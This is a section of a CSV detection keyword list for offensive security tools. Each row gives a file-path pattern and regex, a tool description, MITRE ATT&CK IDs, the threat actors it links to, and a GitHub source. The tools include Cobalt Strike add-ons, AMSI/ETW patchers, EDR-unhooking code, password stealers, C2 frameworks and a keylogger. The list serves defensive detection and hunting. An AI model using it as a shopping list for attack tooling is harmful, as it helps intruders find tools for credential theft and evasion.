"*/password/mimipenguin/*",".{0,1000}\/password\/mimipenguin\/.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","9531"
"*/password_brute.txt*",".{0,1000}\/password_brute\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","9532"
"*/password_cracker.py*",".{0,1000}\/password_cracker\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","9533"
"*/password_ruled.txt*",".{0,1000}\/password_ruled\.txt.{0,1000}","offensive_tool_keyword","hashcat-rule","Rule for hashcat or john. Aiming to crack how people generate their password","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/clem9669/hashcat-rule","1","1","#linux","N/A","10","5","435","47","2024-09-02T20:14:15Z","2020-03-06T17:20:40Z","9534"
"*/password_sniffer.html*",".{0,1000}\/password_sniffer\.html.{0,1000}","offensive_tool_keyword","SniffPass","password monitoring software that listens to your network - capture the passwords that pass through your network adapter and display them on the screen instantly","T1040 - T1071 - T1041","TA0006 - TA0007 - TA0009","N/A","GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/password_sniffer.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","9535"
"*/passwordcracker.Dockerfile*",".{0,1000}\/passwordcracker\.Dockerfile.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","9536"
"*/passwordcracker/*",".{0,1000}\/passwordcracker\/.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","9537"
"*/Passwords.docx*",".{0,1000}\/Passwords\.docx.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","9538"
"*/Passwords/Common-Credentials/10k-most-common.txt*",".{0,1000}\/Passwords\/Common\-Credentials\/10k\-most\-common\.txt.{0,1000}","offensive_tool_keyword","win-brute-logon","Crack any Microsoft Windows users password without any privilege (Guest account included)","T1110.001 - T1078.001 - T1187 - T1055 - T1547 - T1003.005","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/PhrozenIO/win-brute-logon","1","1","N/A","N/A","7","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","9539"
"*/PasswordStealer.dll*",".{0,1000}\/PasswordStealer\.dll.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","1","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","9540"
"*/pastehakk.git*",".{0,1000}\/pastehakk\.git.{0,1000}","offensive_tool_keyword","pastehakk","perform clipboard poisoning or paste jacking attack","T1115","T0001 - T0002 - T0005","N/A","N/A","Phishing","https://github.com/3xploitGuy/pastehakk","1","1","N/A","N/A","7","1","56","10","2020-06-22T01:17:53Z","2020-06-17T19:32:24Z","9541"
"*/pastehakk.sh*",".{0,1000}\/pastehakk\.sh.{0,1000}","offensive_tool_keyword","pastehakk","perform clipboard poisoning or paste jacking attack","T1115","T0001 - T0002 - T0005","N/A","N/A","Phishing","https://github.com/3xploitGuy/pastehakk","1","1","#linux","N/A","7","1","56","10","2020-06-22T01:17:53Z","2020-06-17T19:32:24Z","9542"
"*/patch_amsi.exe*",".{0,1000}\/patch_amsi\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","9543"
"*/Patch_AMSI.py*",".{0,1000}\/Patch_AMSI\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","9544"
"*/Patch_AMSI.vba*",".{0,1000}\/Patch_AMSI\.vba.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","9545"
"*/patch_etw.exe*",".{0,1000}\/patch_etw\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","9546"
"*/patchfinder64.*",".{0,1000}\/patchfinder64\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","9547"
"*/PatchingAPI.cpp*",".{0,1000}\/PatchingAPI\.cpp.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","N/A","9","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","9548"
"*/PatchingAPI.exe*",".{0,1000}\/PatchingAPI\.exe.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","N/A","9","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","9549"
"*/path_traversal.txt*",".{0,1000}\/path_traversal\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","9550"
"*/path_traversal_dict.txt*",".{0,1000}\/path_traversal_dict\.txt.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/0xless/slip","1","1","N/A","N/A","10","2","100","4","2025-04-11T18:36:31Z","2022-10-29T15:38:36Z","9551"
"*/path_traversal_win32.txt*",".{0,1000}\/path_traversal_win32\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","9552"
"*/path-mtu.nse*",".{0,1000}\/path\-mtu\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9553"
"*/payload.exe*",".{0,1000}\/payload\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","9554"
"*/payload.hta*",".{0,1000}\/payload\.hta.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","9555"
"*/payload_placement.exe*",".{0,1000}\/payload_placement\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","9556"
"*/payload_scripts*",".{0,1000}\/payload_scripts.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","9557"
"*/payload_scripts/artifact*",".{0,1000}\/payload_scripts\/artifact.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","9558"
"*/payload_service.sh*",".{0,1000}\/payload_service\.sh.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","9559"
"*/Payload_Type/athena*",".{0,1000}\/Payload_Type\/athena.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","9560"
"*/Payload_Types/*",".{0,1000}\/Payload_Types\/.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","9561"
"*/payload2.ps1*",".{0,1000}\/payload2\.ps1.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","9562"
"*/Payload-Download-Cradles.git*",".{0,1000}\/Payload\-Download\-Cradles\.git.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","9563"
"*/payloads/DllLdr/*",".{0,1000}\/payloads\/DllLdr\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","9564"
"*/payloads/util*",".{0,1000}\/payloads\/util.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","9565"
"*/payloadtests.py*",".{0,1000}\/payloadtests\.py.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE  ELF  Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","9566"
"*/pcanywhere-brute.nse*",".{0,1000}\/pcanywhere\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9568"
"*/pcworx-info.nse*",".{0,1000}\/pcworx\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9579"
"*/PDF_Payload/script.txt*",".{0,1000}\/PDF_Payload\/script\.txt.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tool","https://github.com/D00MFist/Mystikal","1","1","N/A","N/A","9","4","305","39","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z","9580"
"*/pdf2john.py*",".{0,1000}\/pdf2john\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","9581"
"*/pdf-exploit.git*","\/pdf\-exploit\.git","offensive_tool_keyword","POC","CVE-2024-4367 poc exploitation","T1566","TA0042","N/A","N/A","Resource Development","https://github.com/rzte/pdf-exploit","1","1","N/A","N/A","6","3","216","41","2024-07-19T03:04:41Z","2024-07-11T14:33:11Z","9582"
"*/pe/dll*",".{0,1000}\/pe\/dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","9583"
"*/PE/InjectPE.cs*",".{0,1000}\/PE\/InjectPE\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","9584"
"*/pe_to_shellcode*",".{0,1000}\/pe_to_shellcode.{0,1000}","offensive_tool_keyword","pe_to_shellcode","Converts PE into a shellcode","T1027 - T1059.004 - T1105 - T1036","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hasherezade/pe_to_shellcode","1","1","N/A","N/A","N/A","10","2521","452","2023-08-15T14:42:12Z","2018-08-19T22:57:07Z","9585"
"*/pe2shc.exe*",".{0,1000}\/pe2shc\.exe.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","N/A","5","10","1297","197","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z","9586"
"*/pe2shc/*",".{0,1000}\/pe2shc\/.{0,1000}","offensive_tool_keyword","pe_to_shellcode","Converts PE into a shellcode","T1027 - T1059.004 - T1105 - T1036","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hasherezade/pe_to_shellcode","1","1","N/A","N/A","N/A","10","2521","452","2023-08-15T14:42:12Z","2018-08-19T22:57:07Z","9587"
"*/PEASS-ng.git*",".{0,1000}\/PEASS\-ng\.git.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","9588"
"*/PEASS-ng.git*",".{0,1000}\/PEASS\-ng\.git.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","1","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","9589"
"*/PEASS-ng/*",".{0,1000}\/PEASS\-ng\/.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","9590"
"*/PEASS-ng/releases/*",".{0,1000}\/PEASS\-ng\/releases\/.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","1","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","9591"
"*/peeping-client.exe*",".{0,1000}\/peeping\-client\.exe.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","1","N/A","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","9592"
